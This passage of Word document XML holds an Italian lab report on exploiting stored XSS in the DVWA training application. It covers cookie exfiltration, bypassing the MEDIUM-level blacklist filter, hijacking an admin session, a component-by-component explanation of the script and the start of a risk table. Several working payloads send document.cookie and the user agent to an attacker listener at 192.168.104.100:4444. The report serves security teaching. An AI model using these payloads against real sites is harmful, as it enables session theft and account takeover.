      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Alla visita della pagina, il web server dell'attaccante ha ricevuto il cookie di sessione della vittima. Si noti il parametro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">security=low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e, soprattutto, il token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">PHPSESSID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, insieme all'IP di origine e all'orario forniti automaticamente dai log del server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="140"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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762375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie di sessione ricevuto sul listener (livello LOW).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="534AB7"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 Analisi della causa: cookie senza HttpOnly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'ispezione dei cookie conferma la causa dell'esfiltrazione: sia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">PHPSESSID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hanno il flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> impostato a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, motivo per cui lo script è riuscito a leggerli via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il browser segnala inoltre la presenza di campi password su una pagina non cifrata (HTTP), ulteriore debolezza di contorno.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="140"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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762375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabella dei cookie: HttpOnly = false su entrambi i cookie (prova della causa).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="26215C"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Sfruttamento — Livello MEDIUM (bypass del filtro)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Al livello MEDIUM l'applicazione introduce una difesa, ma incompleta. Il campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Message</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> viene sanificato in modo efficace (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">strip_tags</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">htmlspecialchars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), mentre il campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> applica solo una blacklist ingenua che rimuove la stringa letterale </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, una sola volta e sensibile alle maiuscole. L'iniezione si sposta quindi nel campo Name, aggirando il filtro con un tag alterato nel case oppure con un gestore di eventi che non contiene affatto la stringa filtrata:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="22" w:space="10"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="150" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror="new Image().src='http://192.168.104.100:4444/?c='+document.cookie"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="140"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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762375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Livello di sicurezza DVWA impostato su MEDIUM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'attacco è andato a segno anche a questo livello. Il cookie ricevuto riporta ora </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">security=medium</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a conferma che l'esfiltrazione è avvenuta con il filtro attivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="140"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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762375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie ricevuto sul listener con security=medium: filtro aggirato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="EAF3DE" w:sz="2"/>
          <w:bottom w:val="single" w:color="EAF3DE" w:sz="2"/>
          <w:left w:val="single" w:color="3B6D11" w:sz="26" w:space="12"/>
          <w:right w:val="single" w:color="EAF3DE" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="EAF3DE" w:color="auto" w:val="clear"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3B6D11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Lezione.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtrare per blacklist (elencare ciò che è vietato) offre un falso senso di sicurezza: è sufficiente una variante non prevista per aggirarla. La difesa corretta è la codifica sistematica dell'output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="26215C"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Impatto: furto di sessione (account takeover)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per dimostrare l'impatto concreto, il cookie sottratto è stato riutilizzato in una sessione completamente distinta e non autenticata (finestra di navigazione anonima). Dopo aver inserito il valore di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">PHPSESSID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rubato nei cookie del browser, è stata richiesta direttamente la pagina riservata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="140"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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762375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Sessione anonima: inserimento del PHPSESSID sottratto nei cookie del browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il risultato è l'accesso all'area riservata come utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">senza aver inserito alcuna credenziale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il footer conferma </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Username: admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in una finestra partita sloggata: il furto di sessione è completo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="140"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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762375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Accesso riuscito come admin nella finestra anonima, senza password: session hijacking dimostrato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="26215C"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Attività aggiuntive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="534AB7"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 Dump completo dei dati della vittima</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il payload è stato esteso per raccogliere, oltre al cookie, anche la versione del browser della vittima (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">navigator.userAgent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). L'indirizzo IP e la data/ora sono già registrati automaticamente dal web server. La funzione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">encodeURIComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> garantisce che i caratteri speciali non corrompano l'URL di esfiltrazione:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="22" w:space="10"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="150" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;new Image().src="http://192.168.104.100:4444/?c="+encodeURIComponent(document.cookie)+"&amp;ua="+encodeURIComponent(navigator.userAgent);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="534AB7"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2 Guida divulgativa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A corredo è stata prodotta una guida illustrata destinata a un pubblico non tecnico, che spiega in termini semplici il meccanismo dell'attacco e le relative contromisure (documento fornito separatamente).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="26215C"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Spiegazione dello script utilizzato</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La traccia richiede di commentare il significato dello script. Analizzandolo componente per componente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt; ... &lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — delimita il codice JavaScript che il browser esegue. Al livello LOW il tag non viene neutralizzato dall'applicazione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — legge i cookie del sito nel contesto della vittima, incluso il token di sessione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">PHPSESSID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; funziona perché tali cookie non sono protetti dal flag HttpOnly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">new Image()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — crea un oggetto immagine in memoria, usato come pretesto per generare una richiesta di rete silenziosa, senza redirezioni visibili che potrebbero insospettire la vittima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">.src = "http://192.168.104.100:4444/?c=" + document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — impostando la sorgente dell'immagine, il browser contatta automaticamente il server dell'attaccante, trasmettendo il cookie come parametro dell'URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In sintesi, lo script sfrutta l'esecuzione di codice arbitrario nel contesto del sito per esfiltrare il token di sessione verso un server controllato dall'attaccante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="26215C"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Valutazione del rischio</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9100"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D3D1C7" w:sz="2"/>
          <w:left w:val="single" w:color="D3D1C7" w:sz="2"/>
          <w:bottom w:val="single" w:color="D3D1C7" w:sz="2"/>
          <w:right w:val="single" w:color="D3D1C7" w:sz="2"/>
          <w:insideH w:val="single" w:color="E5E3DB" w:sz="2"/>
          <w:insideV w:val="single" w:color="E5E3DB" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3200"/>
        <w:gridCol w:w="5900"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="26215C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tipo di vulnerabilità</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Stored / Persistent XSS (OWASP A03:2021 — Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="26215C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Severità</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A32D2D"/>
              </w:rPr>
              <w:t xml:space="preserve">ALTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
